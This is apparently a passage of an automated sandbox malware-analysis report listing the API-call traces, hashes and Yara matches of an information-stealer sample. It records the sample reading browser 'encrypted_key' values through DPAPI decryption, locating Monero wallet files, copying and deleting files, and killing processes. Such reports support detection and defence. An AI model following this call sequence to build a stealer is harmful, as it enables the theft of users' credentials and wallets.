                                • Opcode Fuzzy Hash: 6a4e7c737c21ade7cb9c86056dabbf69a4b88ab28662c303b3adda59090390a9
                                • Instruction Fuzzy Hash: 605180B0C042189FDB24EB90CD86BEEB3B4EF44304F1461AAE55576281EB746F8ACF54
                                APIs
                                • GetSystemTime.KERNEL32(?), ref: 00ED696C
                                • sscanf.NTDLL ref: 00ED6999
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00ED69B2
                                • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 00ED69C0
                                • ExitProcess.KERNEL32 ref: 00ED69DA
                                Yara matches
                                Similarity
                                • API ID: Time$System$File$ExitProcesssscanf
                                • String ID:
                                • API String ID: 2533653975-0
                                • Opcode ID: 9f8665494cc0dc38a0593c4f793506ed7956c79d4557125eb3b7ead11abe8e88
                                • Instruction ID: ea42297eb98378be1c3b73732eb9733252b4062d175a8ae2cb366d377da38f83
                                • Opcode Fuzzy Hash: 9f8665494cc0dc38a0593c4f793506ed7956c79d4557125eb3b7ead11abe8e88
                                • Instruction Fuzzy Hash: 4221EB75D00208ABCF09EFE4E945AEEB7B9FF48300F04852AE416F3244EB745605CB69
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00ED7E37
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED7E3E
                                • RegOpenKeyExA.ADVAPI32(80000002,01B7BD20,00000000,00020119,?), ref: 00ED7E5E
                                • RegQueryValueExA.ADVAPI32(?,01B8D098,00000000,00000000,000000FF,000000FF), ref: 00ED7E7F
                                • RegCloseKey.ADVAPI32(?), ref: 00ED7E92
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 007fdf27ef563ed927eeecfe17581f288b63970d9869bb27744a120ae13f486e
                                • Instruction ID: 5268385cbab7b6c70f15a156a76aecaa4c50749789d7f306e1b3ecb5bc295736
                                • Opcode Fuzzy Hash: 007fdf27ef563ed927eeecfe17581f288b63970d9869bb27744a120ae13f486e
                                • Instruction Fuzzy Hash: E71191B1E44309EBD714CF94E849FBBBBB8EB44701F10412AFA15A7284D7B459418BA0
                                APIs
                                • StrStrA.SHLWAPI(01B8DD40,?,?,?,00ED140C,?,01B8DD40,00000000), ref: 00ED926C
                                • lstrcpyn.KERNEL32(0110AB88,01B8DD40,01B8DD40,?,00ED140C,?,01B8DD40), ref: 00ED9290
                                • lstrlen.KERNEL32(?,?,00ED140C,?,01B8DD40), ref: 00ED92A7
                                • wsprintfA.USER32 ref: 00ED92C7
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpynlstrlenwsprintf
                                • String ID: %s%s
                                • API String ID: 1206339513-3252725368
                                • Opcode ID: 02c0a43c231dbfdd3e214b83df22eef2945b845c943741f53676ba73270af8af
                                • Instruction ID: d0b524e44cd906e87ae9155a34f3ed7df394ec8a11adcf42fbe2b4f591658a40
                                • Opcode Fuzzy Hash: 02c0a43c231dbfdd3e214b83df22eef2945b845c943741f53676ba73270af8af
                                • Instruction Fuzzy Hash: 2E010C75900208FFCB09DFECE984EAE7BB9EF44354F108548F9099B245C6B1AA80DB90
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00EC12B4
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00EC12BB
                                • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00EC12D7
                                • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00EC12F5
                                • RegCloseKey.ADVAPI32(?), ref: 00EC12FF
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                • String ID:
                                • API String ID: 3225020163-0
                                • Opcode ID: 286a92fd892f9a48d61915f8e23d1781799d93cdb0e121fd449c0fed4b7bd35c
                                • Instruction ID: 74e9d79871d32d4014e98ee9526800f8cdb3de1c2f0f8afa65317c6abc6db132
                                • Opcode Fuzzy Hash: 286a92fd892f9a48d61915f8e23d1781799d93cdb0e121fd449c0fed4b7bd35c
                                • Instruction Fuzzy Hash: B40131B9E40308BBDB14DFE0E849FAEB7B8EF48701F008169FA1597284D6B19A418F50
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00ED6663
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                • ShellExecuteEx.SHELL32(0000003C), ref: 00ED6726
                                • ExitProcess.KERNEL32 ref: 00ED6755
                                Strings
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                                • String ID: <
                                • API String ID: 1148417306-4251816714
                                • Opcode ID: b74dd7682f37c4269f53047d18a3653b2cf843808b86292540acdd44d4ea4107
                                • Instruction ID: 909314bd54b1ba02b0b71445b3b8865de2c5a1069466442e4d12b4999067f349
                                • Opcode Fuzzy Hash: b74dd7682f37c4269f53047d18a3653b2cf843808b86292540acdd44d4ea4107
                                • Instruction Fuzzy Hash: 0A315CB1C00218AADB19EB90DC95BDD77B8EF44300F4061AAF21977281DFB46B89CF59
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00EE0E28,00000000,?), ref: 00ED882F
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8836
                                • wsprintfA.USER32 ref: 00ED8850
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesslstrcpywsprintf
                                • String ID: %dx%d
                                • API String ID: 1695172769-2206825331
                                • Opcode ID: 53bfc8a282d79d79ded03fff078166cf34ce1054bdb442a9e5088a995773c64b
                                • Instruction ID: 0a0e85ebe6c3c94e34cacf0923c8b0ddeeb32636b7dd1a29fce024062247b81e
                                • Opcode Fuzzy Hash: 53bfc8a282d79d79ded03fff078166cf34ce1054bdb442a9e5088a995773c64b
                                • Instruction Fuzzy Hash: E12121B1E40308AFDB14DF94ED45FAEBBB8FB48711F104119F515A7284C7B999418BA0
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00ED951E,00000000), ref: 00ED8D5B
                                • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8D62
                                • wsprintfW.USER32 ref: 00ED8D78
                                Strings
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcesswsprintf
                                • String ID: %hs
                                • API String ID: 769748085-2783943728
                                • Opcode ID: b8b0b3e67c1305d2b76b62db1a497ef3cc71a7b0aa325f7b74b5b98991828ae5
                                • Instruction ID: 0857ac896f60b45ccfef596644b56022827b6fd9e38a5ff7aec10224574e516c
                                • Opcode Fuzzy Hash: b8b0b3e67c1305d2b76b62db1a497ef3cc71a7b0aa325f7b74b5b98991828ae5
                                • Instruction Fuzzy Hash: 66E08670E4030CBBC714DB94E809E5977B8EF04702F004065FD0997240D9B15E408B55
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECA2E1
                                • lstrlen.KERNEL32(00000000,00000000), ref: 00ECA3FF
                                • lstrlen.KERNEL32(00000000), ref: 00ECA6BC
                                  • Part of subcall function 00EDA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00EDA7E6
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECA743
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 82f293d1953008b198c38096c6b88ded7da894732fa792440eb3c671f8f96f5f
                                • Instruction ID: 933f0ee14168822beb241504e4304776972b6c928c29e60ca4ea4ea69b6cb321
                                • Opcode Fuzzy Hash: 82f293d1953008b198c38096c6b88ded7da894732fa792440eb3c671f8f96f5f
                                • Instruction Fuzzy Hash: E1E16D76C101089ACB09FBA0EC96EEE7378EF54300F54917AF41672191EF706B4ADB66
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECD481
                                • lstrlen.KERNEL32(00000000), ref: 00ECD698
                                • lstrlen.KERNEL32(00000000), ref: 00ECD6AC
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECD72B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 4795ef4502cd474cf59cca537609af1af35e5961f1ed17535edd7f4372ef2026
                                • Instruction ID: 212d79abbaf25b732d6050a2e06c77ab2a42da3895f5f725dceb634e003adf56
                                • Opcode Fuzzy Hash: 4795ef4502cd474cf59cca537609af1af35e5961f1ed17535edd7f4372ef2026
                                • Instruction Fuzzy Hash: 9D914F768101089ACB08FBA0DD96EEE7378EF54300F44517AF417B2291EF746B4ADB66
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EDA9B0: lstrlen.KERNEL32(?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00EDA9C5
                                  • Part of subcall function 00EDA9B0: lstrcpy.KERNEL32(00000000), ref: 00EDAA04
                                  • Part of subcall function 00EDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00EDAA12
                                  • Part of subcall function 00EDA8A0: lstrcpy.KERNEL32(?,00EE0E17), ref: 00EDA905
                                  • Part of subcall function 00ED8B60: GetSystemTime.KERNEL32(00EE0E1A,01B89EE8,00EE05AE,?,?,00EC13F9,?,0000001A,00EE0E1A,00000000,?,01B88950,?,\Monero\wallet.keys,00EE0E17), ref: 00ED8B86
                                  • Part of subcall function 00EDA920: lstrcpy.KERNEL32(00000000,?), ref: 00EDA972
                                  • Part of subcall function 00EDA920: lstrcat.KERNEL32(00000000), ref: 00EDA982
                                • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ECD801
                                • lstrlen.KERNEL32(00000000), ref: 00ECD99F
                                • lstrlen.KERNEL32(00000000), ref: 00ECD9B3
                                • DeleteFileA.KERNEL32(00000000), ref: 00ECDA32
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                • String ID:
                                • API String ID: 211194620-0
                                • Opcode ID: 3b81270923d76abf63ab3fbf89ffa8338b909adbcfaad8e6175354b61c24d99c
                                • Instruction ID: 45f8ac930968496ce7a1746254836c21a437def7d9409ba49dd1e5458950e2d8
                                • Opcode Fuzzy Hash: 3b81270923d76abf63ab3fbf89ffa8338b909adbcfaad8e6175354b61c24d99c
                                • Instruction Fuzzy Hash: 408151768101089ACB08FBA0DD96EEE7378EF54300F44513AF417B2291EF746B4ADB62
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrlen
                                • String ID:
                                • API String ID: 367037083-0
                                • Opcode ID: 821d57b9c179dbc356e7348f1526250397627eb5cbdb067267a851267485cea7
                                • Instruction ID: 4a334bbb07b62adbf1e1fd284ec2b63f6f7f9ec4dc35db4e25e153d5af99caba
                                • Opcode Fuzzy Hash: 821d57b9c179dbc356e7348f1526250397627eb5cbdb067267a851267485cea7
                                • Instruction Fuzzy Hash: 67413F75D10209AFCB04EFB5D845AEEB7B4EF44304F04902AE41676390DB75AA46CBA2
                                APIs
                                  • Part of subcall function 00EDA740: lstrcpy.KERNEL32(00EE0E17,00000000), ref: 00EDA788
                                  • Part of subcall function 00EC99C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00EC99EC
                                  • Part of subcall function 00EC99C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00EC9A11
                                  • Part of subcall function 00EC99C0: LocalAlloc.KERNEL32(00000040,?), ref: 00EC9A31
                                  • Part of subcall function 00EC99C0: ReadFile.KERNEL32(000000FF,?,00000000,00EC148F,00000000), ref: 00EC9A5A
                                  • Part of subcall function 00EC99C0: LocalFree.KERNEL32(00EC148F), ref: 00EC9A90
                                  • Part of subcall function 00EC99C0: CloseHandle.KERNEL32(000000FF), ref: 00EC9A9A
                                  • Part of subcall function 00ED8E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00ED8E52
                                • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00EC9D39
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9AEF
                                  • Part of subcall function 00EC9AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B01
                                  • Part of subcall function 00EC9AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N,00000000,00000000), ref: 00EC9B2A
                                  • Part of subcall function 00EC9AC0: LocalFree.KERNEL32(?,?,?,?,00EC4EEE,00000000,?), ref: 00EC9B3F
                                  • Part of subcall function 00EC9B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00EC9B84
                                  • Part of subcall function 00EC9B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00EC9BA3
                                  • Part of subcall function 00EC9B60: LocalFree.KERNEL32(?), ref: 00EC9BD3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                • String ID: $"encrypted_key":"$DPAPI
                                • API String ID: 2100535398-738592651
                                • Opcode ID: bb38d519e6650bf2834154114c4c1f53e0bca1a7d8d67b4c8dcbfa9dcc740bff
                                • Instruction ID: e884cc812019180839e2eb0cac5d3ab26b4240ea7f33720f35b619636e9f6499
                                • Opcode Fuzzy Hash: bb38d519e6650bf2834154114c4c1f53e0bca1a7d8d67b4c8dcbfa9dcc740bff
                                • Instruction Fuzzy Hash: 7C3150B6D10209ABCB04DBE4DD89FEEB7B8AF48304F14551DE902B7242E7319A05CBA1
                                APIs
                                • memset.MSVCRT ref: 00ED94EB
                                  • Part of subcall function 00ED8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00ED951E,00000000), ref: 00ED8D5B
                                  • Part of subcall function 00ED8D50: RtlAllocateHeap.NTDLL(00000000), ref: 00ED8D62
                                  • Part of subcall function 00ED8D50: wsprintfW.USER32 ref: 00ED8D78
                                • OpenProcess.KERNEL32(00001001,00000000,?), ref: 00ED95AB
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00ED95C9
                                • CloseHandle.KERNEL32(00000000), ref: 00ED95D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                • String ID:
                                • API String ID: 3729781310-0
                                • Opcode ID: 1a3f0d393cfecd51d7bbcab8bd45c42bc7a2db1136f1ec84bc0718bfc760bcdb
                                • Instruction ID: 42c8a5119befa2acba33d04971cbe5506b74862dfb32400ac42073113103f767
                                • Opcode Fuzzy Hash: 1a3f0d393cfecd51d7bbcab8bd45c42bc7a2db1136f1ec84bc0718bfc760bcdb
                                • Instruction Fuzzy Hash: C8313E71E003089FDB15DBE0DD49BEDB7B8EF44300F10546AE506AB288DBB49A86CB51
                                APIs
                                • __getptd.LIBCMT ref: 00EDC74E
                                  • Part of subcall function 00EDBF9F: __amsg_exit.LIBCMT ref: 00EDBFAF
                                • __getptd.LIBCMT ref: 00EDC765
                                • __amsg_exit.LIBCMT ref: 00EDC773
                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00EDC797
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                • String ID:
                                • API String ID: 300741435-0
                                • Opcode ID: 56de016301ca9677f038b97fa7ea0548783fe265edf95e4b9c4e951dd0888db0
                                • Instruction ID: c1378bcf0ee1c27e4fb36f779a32a548cf433f0aace2bcc17b87d3f3312c1b0c
                                • Opcode Fuzzy Hash: 56de016301ca9677f038b97fa7ea0548783fe265edf95e4b9c4e951dd0888db0
                                • Instruction Fuzzy Hash: 9FF0F032A00306DBDB20BBB8884274E33E0EF00764F35214BF014BA3D2EB245943CE46
                                APIs
                                  • Part of subcall function 00ED8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00ED8E0B
                                • lstrcat.KERNEL32(?,00000000), ref: 00ED4F7A
                                • lstrcat.KERNEL32(?,00EE1070), ref: 00ED4F97
                                • lstrcat.KERNEL32(?,01B889A0), ref: 00ED4FAB
                                • lstrcat.KERNEL32(?,00EE1074), ref: 00ED4FBD
                                  • Part of subcall function 00ED4910: wsprintfA.USER32 ref: 00ED492C
                                  • Part of subcall function 00ED4910: FindFirstFileA.KERNEL32(?,?), ref: 00ED4943
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FDC), ref: 00ED4971
                                  • Part of subcall function 00ED4910: StrCmpCA.SHLWAPI(?,00EE0FE0), ref: 00ED4987
                                  • Part of subcall function 00ED4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00ED4B7D
                                  • Part of subcall function 00ED4910: FindClose.KERNEL32(000000FF), ref: 00ED4B92
                                Memory Dump Source
                                • Source File: 00000000.00000002.2157012241.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EC0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_ec0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                • String ID:
                                • API String ID: 2667927680-0
                                • Opcode ID: d24e9aad3adb657adce81a7ee1766aa3689c6754f4a9175497075c857b4ae367
                                • Instruction ID: dcc3ed6400791c93ddd1efa1bad57188a0f5785c03382146193312756c73b575
                                • Opcode Fuzzy Hash: d24e9aad3adb657adce81a7ee1766aa3689c6754f4a9175497075c857b4ae367
                                • Instruction Fuzzy Hash: 6021B8B6D0030867C768F760EC46EED337CAB54300F0055A9B659A3185EEB597C98B91